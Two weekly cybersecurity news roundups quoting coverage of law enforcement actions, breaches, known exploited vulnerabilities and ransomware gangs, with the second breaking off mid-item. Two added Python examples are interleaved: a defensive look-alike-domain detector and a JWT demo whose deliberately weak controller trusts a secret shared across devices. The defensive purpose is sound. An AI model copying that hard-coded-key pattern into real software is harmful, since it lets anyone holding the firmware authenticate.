Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cybersecurity Dive reports,
    • “Congress moved one step closer to reauthorizing a key cyber threat information-sharing law on Thursday during a hearing that highlighted both the act’s value and potential shortcomings.
    • The House Homeland Security Committee’s cyber subcommittee held the hearing [on May 15] to evaluate the private sector’s satisfaction with the 2015 Cybersecurity Information Sharing Act, which expires on Sept. 30. Witnesses from the tech industry praised the law for encouraging companies to share cyber threat indicators with each other and with federal agencies, but they also offered lawmakers suggestions for how to improve the program.”
  • Defensescoop tells us,
    • “The Department of Defense has expanded its number of cyber teams by 12, with two more slated to come online in the next few years, according to a spokesperson.
    • “The cyber mission force began building in 2012, and the initial 133 teams reached full operational capability in 2018. In DOD’s fiscal 2022 budget request, U.S. Cyber Command proposed and was eventually approved for a phased approach to add 14 additional cyber mission force teams beyond the original 133. That request and authorization in 2021 was the first substantial effort to grow that force since it was designed almost a decade ago, long before modern and advanced threats had surfaced.
    • “In 2021, the Secretary of Defense directed the creation of 14 new cyber teams by September 2028. Of the 14 teams, 12 have been established. These teams are spread across Army, Air Force, and Navy Commands,” a Cybercom spokesperson said.
    • “They declined to offer specifics regarding how many additional teams each service received or what types of teams those additional builds provided to each service — such as offensive, defensive or support teams — citing operational security.”
  • Per a May 15 HHS press release,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Vision Upright MRI, a small California health care provider that conducts magnetic resonance imaging and related services, concerning potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Breach Notification and Security Rules. The settlement resolves an OCR investigation concerning the breach of an unsecured server containing the medical images of 21,778 individuals.” * * *
    • “Under the terms of the resolution agreement, Vision Upright MRI agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $5,000 to OCR.” 
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/agreements/hhs-ocr-hipaa-racap-vum/index.html”
  • Cyberscoop informs us,
    • “Federal authorities seized two domains and indicted four foreign individuals for alleged involvement in a long-running botnet service that infected older wireless internet routers, the Justice Department said Friday. 
    • “The malware created for the botnet allowed infected routers to be reconfigured, which granted unauthorized access to third parties and made the routers available for sale as proxy servers on Anyproxy.net and 5socks.net, according to law enforcement officials. Both domains, which were managed by a company headquartered in Virginia and hosted on servers worldwide, now render seizure notices under an effort the DOJ and FBI dubbed “Operation Moonlander.”
    • “The 5socks.net website claimed to be in operation for over 20 years and had more than 7,000 proxies for sale worldwide for a monthly subscription of $9.95 to $110 per month, according to prosecutors. The botnet’s overseas operations were also seized and disabled by law enforcement agencies in the Netherlands and Thailand.
    • “Authorities also indicted the botnet’s alleged administrators and charged them with conspiracy and damage to protected computers, for conspiring with others to maintain, operate and profit from the bot.”
  • and
    • “Liridon Masurica, the alleged lead administrator of cybercrime marketplace BlackDB.cc, was extradited to the United States on Friday and faces charges that carry a maximum penalty of 55 years in federal prison, the Justice Department said Tuesday.
    • “Masurica, 33, who is also known as “@blackdb,” was arrested by authorities in Kosovo on Dec. 12. He made his initial appearance in federal court in Tampa, Fla., on Tuesday and was ordered detained pending a trial.
    • “Federal prosecutors charged Masurica with one count of conspiracy to commit access device fraud and five counts of fraudulent use of 15 or more unauthorized access devices.
    • “Masurica, of Gjilan, Kosovo, is accused of running BlackDB.cc since 2018. The cybercriminal marketplace offered to sell compromised account and server credentials, credit card information and other personally identifiable information of individuals mostly located in the United States, the DOJ said.”

From the cybersecurity breaches and vulnerabilities front,

  • Cyberscoop reports,
    • “Hundreds of victims are surfacing across the world from zero-day cyberattacks on Europe’s biggest software manufacturer and company, in a campaign that one leading cyber expert is comparing to the vast Chinese government-linked Salt Typhoon and Volt Typhoon breaches of critical infrastructure.
    • “The zero-days — vulnerabilities previously unknown to researchers or companies, but that malicious hackers have discovered — got patches this month and last month, but there are signs it could be getting worse before it gets better, according to Dave DeWalt, CEO of NightDragon, a venture capital and advisory firm. Ransomware gangs are now reported to be exploiting it, beyond the original Chinese government-connected attackers.
    • “The net of it is this is like the Typhoon size, so much like we saw [with] Volt Typhoon and then Salt Typhoon,” DeWalt told CyberScoop. “Once these exploits get into the wild, it’s a race to see who can get more access to it. So initially it looks like three Chinese actors all used it, and now we’re going to see more.”
    • “A number of companies have been tracking the vulnerability and its consequences, including one, Onapsis, that DeWalt’s company invests in, along with EclecticIQ, ReliaQuest and Google’s Mandiant.”
  • and
    • “Over the past few years, cybersecurity experts have increasingly said that nation-state operatives and cybercriminals often blur the boundaries between geopolitical and financial motivations. A new report released Wednesday shows how North Korea has flipped that idea on its head. 
    • “North Korea has silently forged a global cyber operation that experts now liken to a mafia syndicate, with tactics and organization far removed from other nation-state actors, according to a comprehensive new report released by DTEX Systems.
    • “The study — based on years of investigations, technical analysis, and work with other open-source intelligence analysts — pulls back the curtain on a highly adaptive regime that has built its cyber capabilities on a survivalist, profit-driven approach. It reveals a hierarchy blending criminality, espionage, and front-line IT work, coordinated by an authoritarian government that rewards loyalty and secrecy while punishing failure.” * * *
    • “You can read the full report on DTEX’s website.”
  • Cybersecurity Dive relates,
    • “The FBI is warning about a threat campaign in which malicious actors are impersonating senior U.S. officials using malicious text messages and AI-generated voice messages.
    • “The messages have been sent to current and former federal and state officials and others who may be contacts of those individuals, the bureau said in an alert released Thursday.
    • “The messages are designed to establish a rapport with individuals who might then turn over access to a personal account, according to the alert. These social engineering techniques could be used to reach additional contacts and gain access to additional information or funds.”
  • Bleeping Computer lets us know,
    • “A new tool called ‘Defendnot’ can disable Microsoft Defender on Windows devices by registering a fake antivirus product, even when no real AV is installed.
    • “The trick utilizes an undocumented Windows Security Center (WSC) API that antivirus software uses to tell Windows it is installed and is now managing the real-time protection for the device.
    • “When an antivirus program is registered, Windows automatically disables Microsoft Defender to avoid conflicts from running multiple security applications on the same device.
    • “The Defendnot tool, created by researcher es3n1n, abuses this API by registering a fake antivirus product that meets all of Windows’ validation checks. * * *
    • “While Defendnot is considered a research project, the tool demonstrates how trusted system features can be manipulated to turn off security features.
    • “Microsoft Defender is currently detecting and quarantining Defendnot as a ‘Win32/Sabsik.FL.!ml’ detection.”
  • The Cybersecurity and Infrastructure Security Agency (CISA) added nine known exploited vulnerabilities to its catalog this week.
  • May 13, 2025
    • CVE-2025-30400 Microsoft Windows DWM Core Library Use-After-Free Vulnerability
    • CVE-2025-32701 Microsoft Windows Common Log File System (CLFS) Driver Use-After-Free Vulnerability
    • CVE-2025-32706 Microsoft Windows Common Log File System (CLFS) Driver Heap-Based Buffer Overflow Vulnerability
    • CVE-2025-30397 Microsoft Windows Scripting Engine Type Confusion Vulnerability
    • CVE-2025-32709 Microsoft Windows Ancillary Function Driver for WinSock Use-After-Free Vulnerability
      • CrowdStrike discusses these KEVs here.
      • Cyberscoop discusses Microsoft’s May 13 Patch Tuesday here.
      • See also the Bleeping Computer article titled “Microsoft confirms May Windows 10 updates trigger BitLocker recovery.”
  • May 14, 2025
    • CVE-2025-32756 Fortinet Multiple Products Stack-Based Buffer Overflow Vulnerability
      • Rapid7 discusses this KEV here.
  • May 15, 2025
    • CVE-2024-12987 DrayTek Vigor Routers OS Command Injection Vulnerability
      • This KEV is discussed here.
    • CVE-2025-4664 Google Chromium Loader Insufficient Policy Enforcement Vulnerability
      • This KEV is discussed here.
    • CVE-2025-42999 SAP NetWeaver Deserialization Vulnerability
      • This KEV is discussed here.
  • Cyberscoop adds,
    • “Apple rolled out a series of substantial security updates Monday for its major software platforms, with advisories covering iOS, iPadOS, and two versions of macOS lines, addressing more than 30 vulnerabilities in total. 
    • “Among the numerous fixes, iOS 18.5 and iPadOS 18.5 introduce the first security update for Apple’s in-house C1 modem, featured in the newly released iPhone 16e. The patch addresses a baseband vulnerability (CVE-2025-31214) that, according to the company, could have allowed an attacker “in a privileged network position” to intercept network traffic. While the specific details remain undisclosed, the risk highlights concerns about how devices communicate on the hardware level, since baseband processors control things like data transmission, call processing, and other network functions.”
  • PC World reports
    • “Malware is a thing you just have to be aware of. But it’s pretty rare that it can actually damage your computer in a permanent sense — wipe the drive if you’re okay with losing local data, and you can generally get up and running in a day or two. But what if the microcode running on your CPU’s tiny integrated memory becomes infected? One security researcher says he’s done it.
    • “Christiaan Beek of Rapid7 says he has created a proof-of-concept ransomware that can hide inside a CPU’s microcode, building on previous work that emerged when Google required AMD processors to always return “4” when asked for a random number. He claims that modifying UEFI firmware can install an unsigned update to the processor, slipping past any kind of conventional antivirus or OS-based security.” * * *
    • “CPU-level ransomware has not been seen “in the wild,” and it seems likely that when and if it emerges, it’ll be a state-level actor that exploits it first. That means your typical user probably won’t be targeted, at least immediately. Still, maybe keep a remote backup of your important files, just in case.”

From the ransomware front,

  • Per a news release,
    • “Black Kite, the leader in third-party cyber risk intelligence, today announced its newest report, 2025 Ransomware Report: How Ransomware Wars Threaten Third-Party Cyber Ecosystems, which provides a deep analysis into evolving ransomware trends and threats. The report found that threats have escalated with more actors, less predictability, and deeper entanglement in supply chains, underscoring an urgent need for organizations to implement intelligence-driven defenses and proactive vendor monitoring.”
  • Beckers Hospital Review tells us,
    • “From October 2009 to October 2024, ransomware and hacking have increasingly driven healthcare data breaches, a May 14 study published in JAMA Network Open found. 
    • “The study examined ransomware attacks and other hacking incidents across all healthcare organizations covered by HIPAA from October 2009 through October 2024. It analyzed breaches affecting 500 or more patient records that were reported to the U.S. Department of Health and Human Services (HHS) Office for Civil Rights.”
  • Cybersecurity Dive reports,
    • “A cybercrime gang believed to be responsible for three attacks in the U.K. in recent weeks has turned its attention toward the U.S. and has been able to compromise multiple targets in the sector, according to researchers from Google Threat Intelligence Group and Google subsidiary Mandiant. 
    • “Researchers said the same threat actors linked to attacks against U.K. companies are now using well-crafted social engineering techniques against U.S. retail companies.  
    • “The threat group, tracked as UNC3944 or Scattered Spider, is widely considered the prime suspect in the attacks on British firms Harrods, Co-op and M&S, but Mandiant and Google have not formally attributed the intrusions to any specific actor. Researchers said, however, that the hackers behind the U.S. attacks share the same techniques and procedures as the intruders in the British incidents.”
  • Dark Reading adds,
    • “While dynamic DNS services have been around for many years, they’ve recently emerged as an integral tool in the arsenals of cybercriminal groups like Scattered Spider.
    • “Dynamic DNS (DDNS) services automatically update a domain name’s DNS records in real-time when the Internet service provider changes the IP address. Real-time updating for DNS records wasn’t needed in the early days of the Internet when static IP addresses were the norm.” * * *
    • “In a blog post last month, threat intelligence vendor Silent Push reported that despite some notable arrests of alleged members in 2024, Scattered Spider was actively engaged in new phishing campaigns targeting well-known enterprises. One of the key findings of the report was a shift in tactics from Scattered Spider members that featured the use of rentable subdomains from dynamic DNS providers like it.com Domains LLC.
    • “In an example of an observed attack, Scattered Spider actors established a new subdomain, klv1.it[.]com, designed to impersonate a similar domain, klv1.io, for Klaviyo, a Boston-based marketing automation company.
    • “Silent Push’s report noted that the malicious domain had just five detections on VirusTotal at the time of publication. The company also said the use of publicly rentable subdomains presents challenges for security researchers.”
  • Bleeping Computer points out,
    • “Ransomware gang members increasingly use a new malware called Skitnet (“Bossnet”) to perform stealthy post-exploitation activities on breached networks.
    • “The malware has been offered for sale on underground forums like RAMP since April 2024, but according to Prodaft researchers, it started gaining significant traction among ransomware gangs since early 2025.
    • “Prodaft told BleepingComputer they have observed multiple ransomware operations deploying Skitnet in real-world attacks, including BlackBasta in Microsoft Teams phishing attacks against the enterprise, and Cactus.”
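The Dark Reading item above describes Scattered Spider renting a subdomain under it.com (klv1.it[.]com) to mimic klv1.io. A defensive use of that observation is a watchlist check over DNS query or proxy logs: flag hostnames whose parent zone is a rentable-subdomain or dynamic DNS provider and whose customer-chosen label matches, or is one character edit away from, a label in your own brand hostnames. The following is an added Python example, not code from Dark Reading or Silent Push; it.com and klv1.io come from the article, while the other parent zones, the second protected host and the sample query list are constructed placeholders for lists a defender would maintain.

```python
from typing import List, Optional, Tuple

# Parent zones under which anyone can rent a subdomain. it.com is named in the
# article; the other two are constructed placeholders for a real provider inventory.
RENTABLE_PARENT_ZONES = {"it.com", "ddns.example", "dyn.example"}

# Hostnames whose leftmost label we do not want to see reused under a rentable zone.
# klv1.io is from the article; portal.example.org is a constructed placeholder.
PROTECTED_HOSTS = {"klv1.io", "portal.example.org"}

# Constructed sample of observed DNS queries, including one defanged indicator
# copied from a report and several benign names.
SAMPLE_DNS_QUERIES = [
    "klv1.it[.]com",
    "login.klv1.it.com",
    "k1v1.it.com",
    "updates.it.com",
    "klv1.io",
    "mail.corp.example",
]


def refang(hostname: str) -> str:
    """Normalise case and turn defanged notation such as klv1.it[.]com into a real hostname."""
    return hostname.strip().lower().replace("[.]", ".").rstrip(".")


def split_rentable(hostname: str) -> Optional[Tuple[str, str]]:
    """Return (customer_label, parent_zone) when hostname sits under a rentable parent zone.

    The label directly under the parent zone is the one the renter chose, so that is
    what gets compared against protected labels; deeper labels (login.klv1.it.com)
    are ignored because the renter controls them all anyway.
    """
    for zone in RENTABLE_PARENT_ZONES:
        suffix = "." + zone
        if hostname.endswith(suffix):
            sub = hostname[: -len(suffix)]
            if sub:
                return sub.split(".")[-1], zone
    return None


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character typosquats of a protected label."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalikes(hostnames: List[str]) -> List[Tuple[str, str, str]]:
    """Return (hostname, protected_host, 'exact'|'near') for every rentable-zone look-alike."""
    brand_labels = {h.split(".")[0]: h for h in sorted(PROTECTED_HOSTS)}
    findings = []
    for raw in hostnames:
        host = refang(raw)
        parts = split_rentable(host)
        if parts is None:
            continue  # not under a rentable zone; out of scope for this check
        label, _zone = parts
        for brand_label, brand_host in brand_labels.items():
            distance = edit_distance(label, brand_label)
            if distance <= 1:
                findings.append((host, brand_host, "exact" if distance == 0 else "near"))
    return findings


if __name__ == "__main__":
    for host, brand, kind in find_lookalikes(SAMPLE_DNS_QUERIES):
        print(f"{kind:5} look-alike of {brand}: {host}")
```

Exact matches are the strongest signal; the one-edit "near" class is noisier and is worth reviewing rather than blocking automatically, since short labels collide easily.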

From the cybersecurity business and defenses front,

  • Cyberscoop reports,
    • “Proofpoint has entered into an agreement to acquire Hornetsecurity Group, a Germany-based provider of Microsoft 365 security services, in a deal reportedly valued at more than $1 billion.
    • “The acquisition, described as the largest in Proofpoint’s history, comes amid accelerating consolidation in the cybersecurity industry as companies seek to broaden their offerings to enterprise customers of all sizes. While Proofpoint did not disclose terms, CNBC reports the deal is “well over” $1 billion. 
    • “Hornetsecurity, headquartered in Hannover, Germany, serves more than 12,000 managed service providers (MSPs) and 125,000 small and mid-sized businesses (SMBs) primarily across Europe. According to a press release announcing the deal, Hornetsecurity brings in $160 million in annual recurring revenue, with growth exceeding 20% year over year. 
    • “For Proofpoint, the acquisition provides an entry point into the SMB market through Hornetsecurity’s established MSP network.” * * *
    • “The transaction comes as Proofpoint, which was taken private by Thoma Bravo in 2021 for $12.3 billion, is exploring an IPO, according to the CNBC report.”
  • and
    • “Coinbase responded to a security incident with combative measures Thursday after the company said cybercriminals bribed some of the cryptocurrency exchange’s international support staff to steal data on customers. The unnamed threat group stole personally identifiable information and other sensitive data on less than 1% of Coinbase’s monthly users, the company said in a blog post.
    • “The cybercriminals contacted customers under the guise of an employee at Coinbase in an attempt to dupe people into relinquishing their cryptocurrency. “They then tried to extort Coinbase for $20 million to cover this up. We said no,” the company said.
    • “Coinbase flipped the script as part of its response. “Instead of paying this $20 million ransom, we’re turning it around and we’re putting out a $20 million award for any information leading to the arrest and conviction of these attackers,” Coinbase CEO Brian Armstrong said in a video posted on X.
    • “For these would-be extortionists, or anyone seeking to harm Coinbase customers, know that we will prosecute you and bring you to justice,” he added.” 
  • Dark Reading shares insights on the recent RSAC conference and of course also offers its CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Per a Senate news release,
    • “U.S. Senators Mike Rounds (R-S.D.), Chairman of the Senate Armed Services Committee’s Subcommittee on Cybersecurity, and Gary Peters (D-Mich.) introduced a bipartisan bill to extend the Cybersecurity Information Sharing Act (CISA) of 2015 for an additional ten years.
    • “CISA, signed into law in 2015, incentivizes companies to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware or malicious IP addresses, with the Department of Homeland Security (DHS). This protects Americans’ personal information and makes certain that both the federal government and companies can take collaborative steps to prevent data breaches or attacks from cybercriminals and foreign adversaries.
    • “The Cybersecurity Information Sharing Act of 2015 has been instrumental in strengthening our nation’s cyber defenses by enabling critical information sharing between the private sector and government,” said Rounds. “Allowing this legislation to lapse would significantly weaken our cybersecurity ecosystem, removing vital liability protections and hampering defensive operations across both the defense industrial base and critical infrastructure sectors.”
    • “As cybersecurity threats grow increasingly sophisticated, information sharing is not just valuable—it remains essential for our national security,” said Peters. “For the past ten years, these critical protections have helped to address rapidly evolving cybersecurity threats, and this bipartisan bill will renew them so we can continue this collaborative partnership between the private sector and government to bolster our nation’s cybersecurity defenses against a wide range of adversaries.”
    • Click HERE to read full text of the bill.
  • Cyberscoop reports,
    • “A bipartisan Senate bill would formally ban the use of DeepSeek by federal contractors, part of a larger effort to keep the Chinese-made large language model out of government systems and networks, where lawmakers fear it could pose cybersecurity and national security concerns.
    • “The bill, introduced by Sens. Bill Cassidy, R-La., and Jacky Rosen, D-Nev., would bar federal contractors from using the model to carry out any activity related to a federal contract. It also blocks contractors from using any successor model developed by High Flyer, the Chinese quantitative firm that made DeepSeek.
    • “Cassidy and Rosen cited the potential that the use of DeepSeek — which acknowledges that it sends user data back to China — to carry out contract work may put sensitive federal data in the hands of the Chinese government.
    • “AI is a powerful tool which can be used to enhance things like medicine and education,” Cassidy said in a statement. “But in the wrong hands, it can be weaponized. By feeding sensitive data into systems like DeepSeek, we give China another weapon.” 
  • and
    • “Authorities in Poland have arrested four people accused of administrating and selling access to distributed denial of service (DDoS) services, according to a press release from Europol.  
    • “The suspects are believed to have operated six so-called “stresser” or “booter” services that enabled customers across the world to launch thousands of attacks on targets ranging from government offices to businesses and schools. From 2022 to 2025, the platforms — identified as Cfxapi, Cfxsecurity, neostress, jetstress, quickdown, and zapcut — allegedly allowed users to bombard websites and servers with high volumes of junk traffic, often rendering them inaccessible. 
    • “The services, which offered easy-to-navigate interfaces, required minimal user knowledge: attackers could select a target, choose the attack specifications, and pay as little as 10 euros for each disruption, according to Europol.
    • “The arrests in Poland were part of a coordinated law enforcement response spanning four countries and supported by Europol. In addition to the Central Cybercrime Bureau in Poland, the investigation was supported by German Federal Criminal Police Office, the Prosecutor General’s Office in Frankfurt, the Dutch National Police, and multiple U.S. agencies, including the Department of Justice, FBI, Homeland Security Investigations (HSI), and Defense Criminal Investigative Service (DCIS).” 

From the cybersecurity breaches and vulnerabilities front,

  • Bleeping Computer tells us,
    • “Ascension, one of the largest private healthcare systems in the United States, has revealed that the personal and healthcare information of over 430,000 patients was exposed in a data breach disclosed last month.
    • “As Ascension revealed in breach notification letters sent to affected individuals in April, their information was stolen in a data theft attack that impacted a former business partner in December.
    • “Depending on the impacted patient, the attackers could access personal health information related to inpatient visits, including the physician’s name, admission and discharge dates, diagnosis and billing codes, medical record number, and insurance company name. They could also gain access to personal information, including name, address, phone number(s), email address, date of birth, race, gender, and Social Security numbers (SSNs).” * * *
    • “Our investigation determined on January 21, 2025, that Ascension inadvertently disclosed information to a former business partner, and some of this information was likely stolen from them due to a vulnerability in third-party software used by the former business partner.” * * *
    • “Although Ascension didn’t share any details regarding the breach affecting its former business partner, the timeline of the breach implies that the attack was part of widespread Clop ransomware data theft attacks that exploited a zero-day flaw in Cleo secure file transfer software.
    • “Last year, Ascension notified almost 5.6 million patients and employees that their personal, financial, insurance, and health information had been stolen in a May 2024 Black Basta ransomware attack.”
  • and
    • “Cisco has fixed a maximum severity flaw in IOS XE Software for Wireless LAN Controllers caused by a hard-coded JSON Web Token (JWT) that allows an unauthenticated remote attacker to take over devices.
    • “This token is meant to authenticate requests to a feature called ‘Out-of-Band AP Image Download.’ Since it’s hard-coded, anyone can impersonate an authorized user without credentials.
    • “The vulnerability is tracked as CVE-2025-20188 and has a maximum 10.0 CVSS score, allowing threat actors to fully compromise devices according to the vendor.”
  • Cybersecurity Dive informs us,
    • “A second wave of cyberattacks is targeting a critical vulnerability in SAP NetWeaver Visual Composer, according to researchers.
    • “Following the initial round of threat activity disclosed in April, opportunistic threat actors are leveraging webshells that were previously established through exploitation of CVE-2025-31324. The vulnerability, with a CVSS score of 10, allows unauthenticated attackers to upload arbitrary files and take full control of a system, according to researchers at Onapsis.
    • “Onapsis and Mandiant are tracking hundreds of confirmed compromises worldwide, with the cases spanning across multiple industries, including utilities, manufacturing, oil and gas and other critical infrastructure sectors. 
    • “The Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its known exploited vulnerabilities catalog in late April.” 
  • Cyberscoop adds,
    • “Vulnerabilities are proliferating in SonicWall devices and software this year, putting the vendor’s customers at risk of intrusion via secure access gateways and firewalls.
    • “The year started off on a sour note for the California-based company when it released security advisories for nine vulnerabilities on Jan. 7. The total number of vulnerabilities publicly disclosed by the company so far in 2025 has grown to 20. 
    • “SonicWall vulnerabilities are also making a consistent appearance on the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities (KEV) catalog. Cyber authorities confirm that attackers exploited four vulnerabilities in SonicWall products so far this year, and 14 total since late 2021.
    • “Eight of those vulnerabilities have been exploited in ransomware campaigns, according to CISA.”
  • Bleeping Computer adds,
    • “SonicWall has urged its customers to patch three security vulnerabilities affecting its Secure Mobile Access (SMA) appliances, one of them tagged as exploited in attacks.
    • “Discovered and reported by Rapid7 cybersecurity researcher Ryan Emmons, the three security flaws (CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821) can be chained by attackers to gain remote code execution as root and compromise vulnerable instances.
    • “The vulnerabilities impact SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v devices and are patched in firmware version 10.2.1.15-81sv and higher.”
  • CISA added four known exploited vulnerabilities to its catalog this week.
  • May 5, 2025
    • CVE-2025-3248 Langflow Missing Authentication Vulnerability
    • Dark Reading discusses this KEV here.
  • May 6, 2025
    • CVE-2025-27363 FreeType Out-of-Bounds Write Vulnerability
    • Hacker News discusses this KEV here.
  • May 7, 2025
    • CVE-2024-6047 GeoVision Devices OS Command Injection Vulnerability
    • CVE-2024-11120 GeoVision Devices OS Command Injection Vulnerability
    • SC Media discusses these KEVs here.
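The Cisco item above turns on a token secret that is identical on every device: a JWT signing key shipped in the image authenticates anyone who has extracted it, which is why no credentials are needed. The added Python example below is not Cisco's code and assumes nothing about IOS XE internals. It implements a minimal HS256 sign/verify pair and contrasts a controller that validates tokens with a shipped key against one that validates with a key generated at provisioning; SHIPPED_SECRET, HardcodedKeyController, PerDeviceKeyController and the "ap-image-download" claim are constructed names. The verifier also pins the algorithm and checks exp, two checks that hand-rolled JWT code frequently omits.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_jwt(claims: dict, key: bytes) -> str:
    """Mint an HS256 JWT over `claims` with `key`."""
    header, payload = _segment({"alg": "HS256", "typ": "JWT"}), _segment(claims)
    signature = hmac.new(key, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(signature)}"


def verify_jwt(token: str, key: bytes, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if `token` is HS256, signed with `key` and unexpired; otherwise None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
        signature = _b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return None
    # Pin the algorithm: the token must never be allowed to pick "none" or another alg.
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    current = time.time() if now is None else now
    if not isinstance(claims.get("exp"), (int, float)) or claims["exp"] <= current:
        return None
    return claims


# Constructed secret standing in for a key baked into every shipped firmware image.
SHIPPED_SECRET = b"constructed-secret-present-in-every-image"


class HardcodedKeyController:
    """Weak design: every unit validates tokens with the same key that ships in the image."""

    key = SHIPPED_SECRET

    def authorize(self, token: str, now: Optional[float] = None) -> bool:
        return verify_jwt(token, self.key, now) is not None


class PerDeviceKeyController:
    """Hardened design: the key is generated at provisioning and never leaves this unit."""

    def __init__(self) -> None:
        self.key = secrets.token_bytes(32)

    def authorize(self, token: str, now: Optional[float] = None) -> bool:
        return verify_jwt(token, self.key, now) is not None


def _unsigned_token(claims: dict) -> str:
    """An 'alg: none' token with an empty signature, used to show the verifier rejects it."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def demo(now: float = 1_700_000_000.0) -> dict:
    """Compare how the two designs treat a token minted with the shipped key."""
    claims = {"sub": "ap-image-download", "exp": now + 600}
    shipped_key_token = sign_jwt(claims, SHIPPED_SECRET)
    weak, strong = HardcodedKeyController(), PerDeviceKeyController()
    return {
        "hardcoded_accepts_shipped_key_token": weak.authorize(shipped_key_token, now),
        "per_device_accepts_shipped_key_token": strong.authorize(shipped_key_token, now),
        "per_device_accepts_own_token": strong.authorize(sign_jwt(claims, strong.key), now),
        "expired_token_rejected": not strong.authorize(sign_jwt({**claims, "exp": now - 1}, strong.key), now),
        "alg_none_rejected": not weak.authorize(_unsigned_token(claims), now),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

The point of the per-device class is not the JWT format but where the key lives: once the verifier's secret is unique to the unit and created after manufacturing, a copy of the firmware no longer yields a credential for anything.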

From the ransomware front,

  • Dark Reading reports,
    • “Email-based attacks continued to cost enterprises big bucks in 2024, according to new cyber-insurance claims data.
    • “Cyber-insurance carrier Coalition published its “2025 Cyber Claims Report” on May 7, showing that business email compromise (BEC) attacks and fund transfer fraud (FTF) accounted for 60% of all the company’s claims last year. BEC attacks were particularly problematic for customers, according to Coalition; claims severity for such threats increased 23%, with incidents costing organizations, on average, $35,000.
    • “That dollar figure is a far cry from the average loss for ransomware attacks in 2024, which Coalition said was $292,000. However, the claims report, which features data from customers in the US, the UK, Canada, and Australia, offered some encouraging data points, including a 7% drop in ransomware claims severity and a 3% decline in claims frequency.
    • “Additionally, Coalition found that FTF claims severity fell dramatically by 46%, to an average loss of $185,000, while claims frequency dropped 2%. Overall, the cyber-insurance carrier said it observed “remarkable year-over-year (YoY) stability” for claims, despite an intensifying threat landscape where financially motivated attackers continue to develop novel techniques and exploit new vulnerabilities.”
  • The Hacker News relates,
    • “Threat actors with ties to the Qilin ransomware family have leveraged malware known as SmokeLoader along with a previously undocumented .NET compiled loader codenamed NETXLOADER as part of a campaign observed in November 2024.
    • “NETXLOADER is a new .NET-based loader that plays a critical role in cyber attacks,” Trend Micro researchers Jacob Santos, Raymart Yambot, John Rainier Navato, Sarah Pearl Camiling, and Neljorn Nathaniel Aguas said in a Wednesday analysis.
    • “While hidden, it stealthily deploys additional malicious payloads, such as Agenda ransomware and SmokeLoader. Protected by .NET Reactor 6, NETXLOADER is difficult to analyze.”
    • “Qilin, also called Agenda, has been an active ransomware threat since it surfaced in the threat landscape in July 2022. Last year, cybersecurity company Halcyon discovered an improved version of the ransomware that it named Qilin.B.”
  • Per Bleeping Computer,
    • “The Play ransomware gang has exploited a high-severity Windows Common Log File System flaw in zero-day attacks to gain SYSTEM privileges and deploy malware on compromised systems.
    • “The vulnerability, tracked as CVE-2025-29824, was tagged by Microsoft as exploited in a limited number of attacks and patched during last month’s Patch Tuesday.
    • “The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia,” Microsoft said in April.”
  • The Wall Street Journal reports,
    • “The hacking group that once shut down half the Las Vegas Strip has returned and is causing turmoil at U.K. retailers.
    • “The hackers call themselves Star Fraud but are more widely known as Scattered Spider, a collective of largely young men and teenagers that have wreaked havoc across industries in recent years.
    • “U.K. retailers Harrods, Marks & Spencer and Co-op have all reported cyber intrusions in the past two weeks. Scattered Spider hasn’t been publicly named as the culprit of the hacks, but is suspected in at least some of them, according to people familiar with the investigation.
    • “The attacks bear all the hallmarks of Scattered Spider attacks, disrupting online sales and certain payments and leading to the theft of customer data. The stores have remained open.
    • “The group’s hackers “typically work their way through a sector, so other retailers should take the opportunity to harden their defenses,” said John Hultquist, chief analyst with Google’s Mandiant cybersecurity investigations group.” 
  • Per Cyberscoop,
    • “Five months after education software vendor PowerSchool paid an unnamed threat actor a ransom in exchange for the deletion of sensitive stolen data, some of the company’s customers are now receiving extortion demands. 
    • “A threat actor, who may or not be the same criminal group behind the attack, has contacted four school district customers of PowerSchool in the past few days, CyberScoop has learned, threatening to leak data if they don’t pay. 
    • “The downstream extortion attacks highlight the ongoing risk organizations confront when a vendor is hit by a cyberattack, exposing not just their data but also that of others in their supply chain. The follow-on extortion attempts also underscore that paying ransoms for data does not guarantee stolen data won’t be leaked.”
  • Dark Reading reports,
    • “The notorious ransomware gang LockBit appeared to suffer another setback this week after its network was compromised by an unknown adversary.
